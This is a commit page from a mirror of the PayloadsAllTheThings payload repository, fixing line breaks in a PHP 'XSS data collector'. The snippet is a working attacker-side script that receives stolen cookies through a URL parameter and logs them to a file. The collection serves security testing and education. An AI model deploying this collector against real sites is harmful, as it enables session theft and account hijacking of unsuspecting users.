mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-20 03:16:10 +00:00
Merge pull request #242 from maxrodrigo/master
Fix PHP XSS data collector line breaks
This commit is contained in:
commit
b5e511c03b
@ -82,7 +82,7 @@ Write the collected data into a file.
|
|||||||
<?php
|
<?php
|
||||||
$cookie = $_GET['c'];
|
$cookie = $_GET['c'];
|
||||||
$fp = fopen('cookies.txt', 'a+');
|
$fp = fopen('cookies.txt', 'a+');
|
||||||
fwrite($fp, 'Cookie:' .$cookie.'\r\n');
|
fwrite($fp, 'Cookie:' .$cookie."\r\n");
|
||||||
fclose($fp);
|
fclose($fp);
|
||||||
?>
|
?>
|
||||||
```
|
```
|
||||||
|
Loading…
Reference in New Issue
Block a user